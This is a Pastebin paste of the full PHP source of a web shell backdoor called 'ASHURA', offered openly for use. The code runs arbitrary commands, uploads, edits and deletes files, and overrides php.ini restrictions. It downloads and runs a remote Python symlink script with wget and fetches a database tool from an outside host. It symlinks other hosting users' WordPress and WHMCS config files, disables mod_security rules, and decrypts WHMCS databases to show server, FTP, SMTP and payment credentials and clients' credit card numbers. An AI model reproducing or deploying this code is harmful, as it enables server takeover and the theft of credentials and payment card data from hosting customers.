Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /********************************
- Simple WebShell Backdoor
- Copyright AZZATSSIN'S CYBERSERS ([email protected])
- Special Thx To Allah & You
- ********************************/
- /* hapus simbol comment klo mau di protect sama password ^_^ */
- /*
- $PASSWORD = 'ASHURA';
- session_start();
- if(!$_SESSION['_sfm_allowed']) {
- $t = bin2hex(openssl_random_pseudo_bytes(10));
- if($_POST['p'] && sha1($t.$_POST['p']) === sha1($t.$PASSWORD)) {
- $_SESSION['_sfm_allowed'] = true;
- header('Location: ?');
- }
- echo '<html><head><title>404 Not Found</title></head><head>
- <h1>Not Found</h1>
- <p>The requested URL was not found on this server.</p>
- <style>
- input { margin:0;background-color:#fff;border:1px solid #fff; }
- </style>
- <center> <form method=post><input type=password name=p /></form></html>';
- exit;
- }
- */
- echo ini_get("safe_mode");
- echo ini_get("open_basedir");
- ini_restore("safe_mode");
- ini_restore("open_basedir"); $phi = fopen("php.ini","w+");
- fwrite($phi,"safe_mode = Off
- disable_functions = NONE
- safe_mode_gid = OFF
- open_basedir = OFF ");
- if($_GET['symbolic']=="link"){ system('wget http://wget.yu.tl/files/sympyt.zip');system('mv sympyt.zip symlink.py');system('python symlink.py'); system('rm symlink.py'); echo '<meta http-equiv="Refresh" content= "0; url=SL">'; }
- echo '<title>.: ASHURA WEBSHELL :.</title><center><b><i><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>SIMPLE WEB SHELL BACKDOOR</a></i></b><br><fieldset><font color=lime size=-1><b><i>[<a href="?">HOME</a>] [<a href=?system=info>INFO</a>] [<a href=?upload=file>UPLOAD</a>] [<a href=?symbolic=link>SYMLINK</a>] [<a href=?config=grabber>CONFIG</a>] [<a href=?jumping=user>JUMPING</a>] [<a href=?mysql=connect>MYSQL</a>] [<a href=?command=system>CMD</a>] [<a href=?whmcs=decode>WHMCS</a>]</i></b></font></fieldset></center>'; if($_GET['mysql']=="connect"){ $sins = file_get_contents('http://azzatssins.yu.tl/files/db.zip');
- $azzat = fopen('db.php', 'w');
- fwrite($azzat,$sins);
- fclose($azzat);
- {
- @chmod('db.php',0755);
- }
- echo '<meta http-equiv="Refresh" content= "0; url=db.php">';
- } if($_GET['system']=="info"){ echo'<body bgcolor=black><center><img src=http://azzat.wap.mu/files/1049320/assassin_s_creed_iv_black_flag.png><br><br><i><b><h1><font color=red>PLEASE ENJOY WITH MY SHELL</font></h1><br><br><font color=lime>AUTHOR : </font><a href=mailto:[email protected]>AZZATSSINS CYBERSERKERS</a></b></i><br><font color=yellow>============</font>';
- function is_windows() { return strtolower(substr(PHP_OS,0,3)) == "win"; }
- $server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
- $safe_mode=ini_get('safe_mode');
- $mysql_stat=function_exists('mysql_connect');
- $curl_on=function_exists('curl_version');
- $dis_func=ini_get('disable_functions');
- function sysinfo()
- {
- global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
- echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
- ("<B>Safe Mode: </b><font color=red>OFF</font><b> "));
- $row_dis_func=explode(', ',$dis_func);
- echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
- echo ("MySQL: </b>");
- if($mysql_stat){
- echo "<font color=green>ON </font><b>";
- }
- else {
- echo "<font color=red>OFF </font><b>";
- }
- echo "cURL: </b>";
- if($curl_on){
- echo "<font color=green>ON</font><b><br>";
- }else
- echo "<font color=red>OFF</font><b><br>";
- if ($dis_func!=""){
- echo "Disabled Functions : </b><font color=red>".$dis_func."</font><br><b>";
- }
- else {
- echo "Disabled Functions : </b><font color=green>None</font><br><b>";
- }
- $uname = @exec('uname -a');
- echo "OS: </b><font color=blue>";
- if (empty($uname)){
- echo (php_uname()."</font><br><b>");
- }else
- echo $uname."</font><br><b>";
- $id = @exec('id');
- echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
- echo "ID: </b><font color=blue>";
- if (!empty($id)){
- echo $id."</font><br><b>";
- }else
- echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
- "</font><br><b>";
- echo "<b>RemoteAddress: </b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font> , <b>Server: </b><font color=red>".@gethostbyname($_SERVER["HTTP_HOST"])."</font>";
- if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
- echo "<b>RemoteAddressIfProxy: </b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
- }
- echo "</font></font>";
- }
- function RndName() {
- $codelenght = 10;
- while(@$newcode_length < $codelenght) {
- $x=1;
- $y=3;
- $part = rand($x,$y);
- if($part==1){$a=48;$b=57;}
- if($part==2){$a=65;$b=90;}
- if($part==3){$a=97;$b=122;}
- $code_part=chr(rand($a,$b));
- (@$newcode_length = $newcode_length + 1);
- (@$newcode = $newcode.$code_part);
- }
- return $newcode;
- }
- echo "<CENTER>
- <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse; border-style: solid; border-color: #C0C0C0; padding-left: 4; padding-right: 4; padding-top: 1; padding-bottom: 1' bordercolor='#111111' width='86%' bgcolor='#E0E0E0'>
- <tr>
- <td bgcolor='#AA0000' class='td'><div align='center' class='style4'> <b><i>SYSTEM INFO</i></b></div></td>
- </tr>
- <tr>
- <td style='padding:5px 5px 5px 5px '>";
- echo sysinfo();
- echo " </td>
- </tr>
- </table></CENTER>"; }
- if($_GET['upload']=="file"){
- if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $userfile_name = $_FILES['azzatssins']['name']; $userfile_tmp = $_FILES['azzatssins']['tmp_name']; if (isset($_FILES['azzatssins']['name'])) { $abod = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $abod); echo"<center><b><a href='{$userfile_name}'>SUCCESS</a></b></center>"; } } else{ echo' <center><form method="POST" action="" enctype="multipart/form-data"><input type="file" name="azzatssins"><input type="Submit" name="Submit" value="SUBMIT"></form></center></BODY></HTML><br><br><br><br>'; }
- }
- if($_GET['command']=="system"){ echo'<center><form id="form1" name="form1" method="post" action="">
- <label>
- <input type="text" name="cmd" style="background-color:#000000; color:#de0100; font-family:Corbel;" value=""></label>
- <label>
- <input type="submit" name="Submit" value="Execute" />
- </label>
- <br><textarea name="textarea" style="width:14cm; height:5cm; background-color:#576557; color:#6fd800;">
- '; if(isset($_POST['cmd']))
- {
- $cmd = $_POST['cmd'];
- if($cmd == "")
- {
- echo " Please Insert Command!";
- }
- elseif(isset($cmd))
- {
- $output = system($cmd);
- printf("$output\n");
- }
- }
- echo'</textarea>
- </form>
- </center>'; } ?>
- <?php if($_GET['config']=="grabber"){ ?>
- <center><br>============<br><form method=post>
- <textarea type=hidden rows=10 cols=30 name=user><?php $users=file("/etc/passwd");
- foreach($users as $user)
- {
- $str=explode(":",$user);
- echo $str[0]."\n";
- }
- ?></textarea><br><br>
- <input type=submit name=su value=" GRAB "></form>
- </center><?php
- /*AUTHOR : AZZATSSINS CYBERSERKERS | BN-IDBTE4M */
- if(isset($_POST['su']))
- {
- mkdir('x',0777);
- $r = " # Config Symlink By AZZATSSINS \nOptions Indexes FollowSymLinks \nForceType text/plain \nAddType text/plain .php \nAddType text/plain .html \nAddType text/html .shtml \nAddType txt .php \nAddHandler server-parsed .php \nAddHandler server-parsed .shtml \nAddHandler txt .php \nAddHandler txt .html \nAddHandler txt .shtml \nOptions All \n<IfModule mod_security.c> \nSecFilterEngine Off \nSecFilterScanPOST Off \nSecFilterCheckURLEncoding Off \nSecFilterCheckCookieFormat Off \nSecFilterCheckUnicodeEncoding Off \nSecFilterNormalizeCookies Off \n</IfModule>";
- $f = fopen('x/.htaccess','w');
- fwrite($f,$r);
- $usr=explode("\n",$_POST['user']);
- foreach($usr as $uss)
- {
- $us=trim($uss);
- $r="x/";
- symlink('/home/'.$us.'/public_html/wp-config.php',$r.$us.'..wp-config');
- symlink('/home/'.$us.'/public_html/configuration.php',$r.$us.'..joomla-or-whmcs');symlink('/home/'.$us.'/public_html/blog/wp-config.php',$r.$us.'..wp-config');
- symlink('/home/'.$us.'/public_html/blog/configuration.php',$r.$us.'..joomla');symlink('/home/'.$us.'/public_html/wp/wp-config.php',$r.$us.'..wp-config');
- symlink('/home/'.$us.'/public_html/wordpress/wp-congig.php',$r.$us.'..wordpress');symlink('/home/'.$us.'/public_html/config.php',$r.$us.'..config');
- symlink('/home/'.$us.'/public_html/whmcs/configuration.php',$r.$us.'..whmcs');
- symlink('/home/'.$us.'/public_html/support/configuration.php',$r.$us.'..supporwhmcs');
- symlink('/home/'.$us.'/public_html/secure/configuration.php',$r.$us.'..securewhmcs');
- symlink('/home/'.$us.'/public_html/clients/configuration.php',$r.$us.'..whmcs-clients');
- symlink('/home/'.$us.'/public_html/client/configuration.php',$r.$us.'..whmcs-client');
- symlink('/home/'.$us.'/public_html/billing/configuration.php',$r.$us.'..whmcs-billing');
- symlink('/home/'.$us.'/public_html/admin/config.php',$r.$us.'..admin-config');
- echo'<meta http-equiv="Refresh" content= "0; url=x">';}}?><?php } ?>
- <?php echo'
- <table align="center">
- <b><i><tr><td><b>PATH :</b> ';
- if(isset($_GET['path'])){
- $path = base64_decode($_GET['path']);
- }else{
- $path = getcwd();
- }
- $pathen = base64_encode($path);
- $path = str_replace('\\','/',$path);
- $paths = explode('/',$path);
- foreach($paths as $id=>$pat){
- if($pat == '' && $id == 0){
- $a = true;
- echo '<a href="?path='.base64_encode("/").'">/</a>';
- continue;
- }
- if($pat == '') continue;
- echo '<a href="?path=';
- $linkpath = '';
- for($i=0;$i<=$id;$i++){
- $linkpath .= "$paths[$i]";
- if($i != $id) $linkpath .= "/";
- }
- echo base64_encode($linkpath);
- echo '">'.$pat.'</a>/';
- }
- if(isset($_GET['filesrc'])){
- echo "<tr><td>Current File : ";
- echo base64_decode($_GET['filesrc']);
- echo '</tr></td></table><br />';
- echo('<pre>'.htmlspecialchars(file_get_contents(base64_decode($_GET['filesrc']))).'</pre>');
- }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
- echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
- if($_POST['opt'] == 'chmod'){
- if(isset($_POST['perm'])){
- if(chmod($_POST['path'],$_POST['perm'])){
- echo '<font color="lime">Change Permission Done.</font><br />';
- }else{
- echo '<font color="red">Change Permission Error.</font><br />';
- }
- }
- echo '<form method="POST">
- Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="chmod">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'rename'){
- if(isset($_POST['newname'])){
- if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
- echo '<font color="lime">Change Name Done.</font><br />';
- }else{
- echo '<font color="red">Change Name Error.</font><br />';
- }
- $_POST['name'] = $_POST['newname'];
- }
- echo '<form method="POST">
- New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="rename">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'edit'){
- if(isset($_POST['src'])){
- $fp = fopen($_POST['path'],'w');
- if(fwrite($fp,$_POST['src'])){
- echo '<font color="lime">Edit File Done.</font><br />';
- }else{
- echo '<font color="red">Edit File Error.</font><br />';
- }
- fclose($fp);
- }
- echo '<form method="POST">
- <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="edit">
- <input type="submit" value="Go" />
- </form>';
- }
- echo '</center>';
- }else{
- echo '</table><br /><center>';
- if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
- if($_POST['type'] == 'dir'){
- if(rmdir($_POST['path'])){
- echo '<font color="lime">Delete Dir Done.</font><br />';
- }else{
- echo '<font color="red">Delete Dir Error.</font><br />';
- }
- }elseif($_POST['type'] == 'file'){
- if(unlink($_POST['path'])){
- echo '<font color="lime">Delete File Done.</font><br />';
- }else{
- echo '<font color="red">Delete File Error.</font><br />';
- }
- }
- }
- echo '</center>';
- $scandir = scandir($path);
- echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
- <tr class="first">
- <td><center>Name</center></td>
- <td><center>Size</center></td>
- <td><center>Permissions</center></td>
- <td><center>Options</center></td>
- </tr>';
- foreach($scandir as $dir){
- if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
- $dirlink = base64_encode("$path/$dir");
- echo "<tr>
- <td><a href=\"?path=$dirlink\">$dir</a></td>
- <td><center>--</center></td>
- <td><center>";
- if(is_writable("$path/$dir")) echo '<font color="lime">';
- elseif(!is_readable("$path/$dir")) echo '<font color="red">';
- echo perms("$path/$dir");
- if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
- echo "</center></td>
- <td><center><form method=\"POST\" action=\"?option&path=$pathen\">
- <select name=\"opt\">
- <option value=\"\"></option>
- <option value=\"delete\">Delete</option>
- <option value=\"chmod\">Chmod</option>
- <option value=\"rename\">Rename</option>
- </select>
- <input type=\"hidden\" name=\"type\" value=\"dir\">
- <input type=\"hidden\" name=\"name\" value=\"$dir\">
- <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
- <input type=\"submit\" value=\">\" />
- </form></center></td>
- </tr>";
- }
- echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
- foreach($scandir as $file){
- if(!is_file("$path/$file")) continue;
- $size = filesize("$path/$file")/1024;
- $size = round($size,3);
- if($size >= 1024){
- $size = round($size/1024,2).' MB';
- }else{
- $size = $size.' KB';
- }
- $filelink = base64_encode("$path/$file");
- echo "<tr>
- <td><a href=\"?filesrc=$filelink&path=$pathen\">$file</a></td>
- <td><center>".$size."</center></td>
- <td><center>";
- if(is_writable("$path/$file")) echo '<font color="lime">';
- elseif(!is_readable("$path/$file")) echo '<font color="red">';
- echo perms("$path/$file");
- if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
- echo "</center></td>
- <td><center><form method=\"POST\" action=\"?option&path=$pathen\">
- <select name=\"opt\">
- <option value=\"\"></option>
- <option value=\"delete\">Delete</option>
- <option value=\"chmod\">Chmod</option>
- <option value=\"rename\">Rename</option>
- <option value=\"edit\">Edit</option>
- </select>
- <input type=\"hidden\" name=\"type\" value=\"file\">
- <input type=\"hidden\" name=\"name\" value=\"$file\">
- <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
- <input type=\"submit\" value=\">\" />
- </form></center></td>
- </tr>";
- }
- echo '</i></b></table>
- </div>';
- }
- function perms($file){
- $perms = @fileperms($file);
- if (($perms & 0xC000) == 0xC000) {
- // Socket
- $info = 's';
- } elseif (($perms & 0xA000) == 0xA000) {
- // Symbolic Link
- $info = 'l';
- } elseif (($perms & 0x8000) == 0x8000) {
- // Regular
- $info = '-';
- } elseif (($perms & 0x6000) == 0x6000) {
- // Block special
- $info = 'b';
- } elseif (($perms & 0x4000) == 0x4000) {
- // Directory
- $info = 'd';
- } elseif (($perms & 0x2000) == 0x2000) {
- // Character special
- $info = 'c';
- } elseif (($perms & 0x1000) == 0x1000) {
- // FIFO pipe
- $info = 'p';
- } else {
- // Unknown
- $info = 'u';
- }
- // Owner
- $info .= (($perms & 0x0100) ? 'r' : '-');
- $info .= (($perms & 0x0080) ? 'w' : '-');
- $info .= (($perms & 0x0040) ?
- (($perms & 0x0800) ? 's' : 'x' ) :
- (($perms & 0x0800) ? 'S' : '-'));
- // Group
- $info .= (($perms & 0x0020) ? 'r' : '-');
- $info .= (($perms & 0x0010) ? 'w' : '-');
- $info .= (($perms & 0x0008) ?
- (($perms & 0x0400) ? 's' : 'x' ) :
- (($perms & 0x0400) ? 'S' : '-'));
- // World
- $info .= (($perms & 0x0004) ? 'r' : '-');
- $info .= (($perms & 0x0002) ? 'w' : '-');
- $info .= (($perms & 0x0001) ?
- (($perms & 0x0200) ? 't' : 'x' ) :
- (($perms & 0x0200) ? 'T' : '-'));
- return $info;
- }
- echo "<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>";
- if($_GET['jumping']=="user"){
- echo "<center><h1><font color='lime'>JUMPING</a></h1></center><br>";
- //$us = file_get_contents("/etc/passwd");
- $usa = fopen('/etc/passwd','r');
- $dir = mkdir('loncat', 0777);
- $rrrr = "Options all \n DirectoryIndex jump \n Require None \n Satisfy Any";
- $frr = fopen('loncat/.htaccess', 'w');
- fwrite($frr, $rrrr);
- while($us = fgets($usa)){
- if($us==""){
- echo "<font color=red>can't read /etc/passwd</font>";
- }
- else{
- preg_match_all('/(.*?):x:/', $us, $user_byk);
- foreach($user_byk[1] as $user){
- $dir1 = "/home/$user/public_html/";
- $ashura = base64_encode($dir1);
- if(is_readable($dir1)){
- echo "<center><fieldset><i><b><font color='lime'><a href='?path={$ashura}'>$dir1</a></b></i></fieldset></center><br>";
- }
- else{
- }
- }
- }
- }
- }
- /* Bagi Seorang Newbie Seperti Saya, Edit Script Ginian Aja Membutuhkan Waktu 7 Hari 7 Malam, :'( Dah Aku Mah Apa Atuh....!!! (AZZATSSINS CYBERSERKERS) */ ?>
- <?
- if($_GET['whmcs']=="decode"){
- ?>
- <p><br/><body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
- <center><br/><br/><nobr><b><font color=lime><span class="b7">XXX WHMCS</span> <span class="b8">DECODER XXX</span></font></b></nobr><br/><br/>
- <p><form method="post">
- <table border=1>
- <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
- <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
- <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
- <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
- <tr><td>cc_encryption_hash</td><td><input style="color:#FF0000;background-color:#000000" type="text" size="60" name="anu5"></td></tr>
- <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
- </table>
- <br></form></center>
- <?php
- $perawan = $_POST['anu1'];
- $kimcil = $_POST['anu2'];
- $janda = $_POST['anu3'];
- $hotel = $_POST['anu4'];
- $kondom = $_POST['anu5'];
- @mysql_connect($perawan,$kimcil,$janda);
- @mysql_select_db($hotel);
- $cc_encryption_hash = $kondom;
- function dec($string,$cc_encryption_hash){
- $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
- $hash_key = _hash($key);
- $hash_length = strlen($hash_key);
- $string = base64_decode($string);
- $tmp_iv = substr($string,0,$hash_length);
- $string = substr($string,$hash_length,strlen ($string) - $hash_length);
- $iv = $out = '';
- $c = 0;
- while ($c < $hash_length){
- $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
- ++$c;
- }
- $key = $iv;
- $c = 0;
- while ($c < strlen($string)){
- if (($c != 0 AND $c % $hash_length == 0)){
- $key = _hash($key . substr($out,$c - $hash_length,$hash_length));
- }
- $out .= chr(ord($key[$c % $hash_length]) ^ ord ($string[$c]));
- ++$c;
- }
- return $out;
- }
- function _hash($string)
- {
- $hash = (function_exists('sha1')) ? sha1($string):md5($string);
- $out = '';
- $c = 0;
- while ($c < strlen($hash)){
- $out .= chr(hexdec($hash[$c] .$hash[$c + 1]));
- $c += 2;
- }
- return $out;
- }
- ######## GO TO HELL ########
- ##### :D ########### :D #####
- if(isset($_POST['plapon'])) {
- $query = mysql_query("SELECT *FROM tblservers");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='7'> <span class='b7'><a href='http://fb.me/AZZATSSINS.CYBERSERKERS'>[ HOST ROOT ]</a></span> </th></tr>
- <tr>
- <th align='center'><b>TYPE</b></th>
- <th align='center'><b>ACTIVE</b></th>
- <th align='center'><b>HOSTNAME</b></th>
- <th align='center'><b>IP ADDRESS</b></th>
- <th align='center'><b>USERNAME</b></th>
- <th align='center'><b>PASSWORD</b></th>
- <th align='center'><b>ACCESS HASH</b></th></tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='8' align='center'>Nothing Found !</td></tr>";
- }
- while($v = mysql_fetch_array($query)) {
- echo "<tr>
- <td align='center'>{$v['type']}</td>
- <td align='center'>{$v['active']}</td>
- <td align='center'>{$v['hostname']}</td>
- <td align='center'>{$v['ipaddress']}</td>
- <td align='center'>{$v['username']}</td>
- <td align='center'>".dec($v['password'],$cc_encryption_hash)."</td>
- <td align='center'>{$v['accesshash']}</td>
- </tr>";
- }
- echo "</table>";
- $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'vmuserxx' or username = 'vmuser' or username = 'admin' or username = 'Admin' or username = 'administrator' or username = 'Administrator' order by domainstatus");
- echo "<body style='color: #12ae00;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
- <br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='6'><span class='b7'>O=:[ CLIENTS ROOT ]:=O</span> </th></tr>
- <tr>
- <th align='center'><b> DOMAIN</b></th>
- <th align='center'><b> STATUS</b></th>
- <th align='center'><b> USERNAME</b></th>
- <th align='center'><b> PASSWORD</b></th>
- <th align='center'><b> DEDICATED IP</b></th>
- <th align='center'><b> ASSIGNED IP</b></th></tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='6' align='center'>Nothing Found ! :(</td></tr>";
- }
- while($v = mysql_fetch_array($query)){
- echo "<tr>
- <td align='center'> {$v['domain']}</td>
- <td align='center'> {$v['domainstatus']}</td>
- <td align='center'> {$v['username']}</td>
- <td align='center'> ".dec($v['password'],$cc_encryption_hash)."</td>
- <td align='center'> {$v['dedicatedip']}</td>
- <td align='center'> {$v['assignedips']}</td></tr>";
- }
- echo "</table>";
- $query = mysql_query("SELECT *FROM tblregistrars");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='3'><nobr><span class='b7'>O=:[ DOMAIN REGISTRAR ]:=O</span></nobr></th></tr>
- <tr>
- <th align='center'><b>REGISTRAR</b></th>
- <th align='center'><b>SETTING</b></th>
- <th align='center'><b>VALUE</b></th></tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='3' align='center'>Nothing Found !</td></tr>";
- }
- while($v = mysql_fetch_array($query)){
- $value = (!dec($v['value'],$cc_encryption_hash)) ? "0":dec($v['value'],$cc_encryption_hash);
- echo "<tr>
- <td align='center'>{$v['registrar']}</td>
- <td align='center'>{$v['setting']}</td>
- <td align='center'>$value</td></tr>" ;
- }
- echo "</table>";
- $query = mysql_query("SELECT * FROM tblconfiguration where 1");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='4'> <span class='b7'>O=:[ FTP BACKUP ]:=O</span> </th></tr>
- <tr>
- <th align='center'><b>FTP HOSTNAME</b></th>
- <th align='center'><b>FTP USERNAME</b></th>
- <th align='center'><b>FTP PASSWORD</b></th>
- <th align='center'><b>DESTINATION</b></th></tr>";
- $ftpb = array('FTPBackupHostname',
- 'FTPBackupUsername',
- 'FTPBackupPassword',
- 'FTPBackupDestination');
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
- }
- while($row = mysql_fetch_array($query)){
- if($row[setting] == $ftpb[0]){
- echo "<tr><td>{$row[value]}</td>";
- $ftpb[0] = xxx;
- }
- elseif($row[setting] == $ftpb[1]){
- echo "<td>{$row[value]}</td>";
- $ftpb[1] = xxx;
- }
- elseif($row[setting] == $ftpb[2]){
- echo "<td>{$row[value]}</td>";
- $ftpb[2] = xxx;
- }
- elseif($row[setting] == $ftpb[3]){
- echo "<td>{$row[value]}</td>";
- $ftpb[3] = xxx;
- }
- }
- echo "</table>";
- $query = mysql_query("SELECT * FROM tblconfiguration where 1");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='4'><span class='b7'>O=:[ SMTP SERVER ]:=O</span> </th></tr>
- <tr>
- <th align='center'><b>SMTP HOST</b></th>
- <th align='center'><b>SMTP USER</b></th>
- <th align='center'><b>SMTP PASS</b></th>
- <th align='center'><b>SMTP PORT</b></th></tr>";
- $smtp = array('SMTPHost',
- 'SMTPUsername',
- 'SMTPPassword',
- 'SMTPPort');
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
- }
- while($row = mysql_fetch_array($query)){
- if($row[setting] == $smtp[0]){
- echo "<tr><td>{$row[value]}</td>";
- $smtp[0] = xxx;
- }
- elseif($row[setting] == $smtp[1]){
- echo "<td>{$row[value]}</td>";
- $smtp[1] = xxx;
- }
- elseif($row[setting] == $smtp[2]){
- echo "<td>{$row[value]}</td>";
- $smtp[2] = xxx;
- }
- elseif($row[setting] == $smtp[3]){
- echo "<td>{$row[value]}</td>";
- $smtp[3] = xxx;
- }
- }
- echo "</table>";
- $query = mysql_query("SELECT *FROM tblpaymentgateways");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='4'><nobr><span class='b7'>O=:[ PAYMENTS GATEWAY ]:=O</span></nobr></th></tr>
- <tr>
- <th align='center'><b>GATEWAY</b></th>
- <th align='center'><b>SETTING</b></th>
- <th align='center'><b>VALUE</b></th>
- <th align='center'><b>ORDER</b></th></tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
- }
- while($v = mysql_fetch_array($query)){
- echo "<tr>
- <td align='center'>{$v['gateway']}</td>
- <td align='center'>{$v['setting']}</td>
- <td align='center'>{$v['value']}</td>
- <td align='center'>{$v['order']}</td> </tr>" ;
- }
- echo "</table>";
- $query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
- echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='10'><nobr><span class='b7'>O=:[ CLIENTS CREDIT CARD ]:=O</span></nobr></th></tr>
- <tr>
- <th align='center'><b>CardType</b></th>
- <th align='center'><b>CardNumb</b></th>
- <th align='center'><b>Expdate</b></th>
- <th align='center'><b>IssueNumber</b></th>
- <th align='center'><b>FirstName</b></th>
- <th align='center'><b>LastName</b></th>
- <th align='center'><b>Address</b></th>
- <th align='center'><b>Country</b></th>
- <th align='center'><b>Phone</b></th>
- <th align='center'><b>Email</b></th>
- </tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='10' align='center'>Nothing Found ! :(</td></tr>";
- }
- while($v = mysql_fetch_array($query)) {
- $cchash = md5($cc_encryption_hash.$v['0']);
- $s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='".$v['0']."'");
- $v2=mysql_fetch_array($s);
- echo "<tr>
- <td align='center'>".$v2['cardtype']."</td>
- <td align='center'>".$v2['cardnum']."</td>
- <td align='center'>".$v2['expdate']."</td>
- <td align='center'>".$v2['issuenumber']."</td>
- <td align='center'>".$v2['firstname']."</td>
- <td align='center'>".$v2['lastname']."</td>
- <td align='center'>".$v2['address1']."</td>
- <td align='center'>".$v2['country']."</td>
- <td align='center'>".$v2['phonenumber']."</td>
- <td align='center'>".$v2['email']."</td></tr>";
- }
- echo "</table>";
- $query = mysql_query("SELECT *FROM tblhosting");
- echo "<br/><br/><center>
- <table class='explore' style=width:830px;padding:0 1px;>
- <tr><th colspan='6'><nobr><span class='b7'>O=:[ CLIENTS HOSTING ACCOUNT ]:=O</span></nobr></th></tr>
- <tr>
- <th align='center'><b>DOMAIN</b></th>
- <th align='center'><b>STATUS</b></th>
- <th align='center'><b>USERNAME</b></th>
- <th align='center'><b>PASSWORD</b></th>
- <th align='center'><b>DEDICATED IP</b></th>
- <th align='center'><b>ASSIGNED IP</b></th></tr>";
- if(!is_array(mysql_fetch_array($query))){
- echo "<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
- }
- while($v = mysql_fetch_array($query)){
- echo "<tr>
- <td align='center'>{$v['domain']}</td>
- <td align='center'>{$v['domainstatus']}</td>
- <td align='center'>{$v['username']}</td>
- <td align='center'>".dec($v['password'],$cc_encryption_hash)."</td>
- <td align='center'>{$v['dedicatedip']}</td>
- <td align='center'>{$v['assignedips']}</td></tr>";
- echo "</table>";
- }
- }
- ?>
- <?php } ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement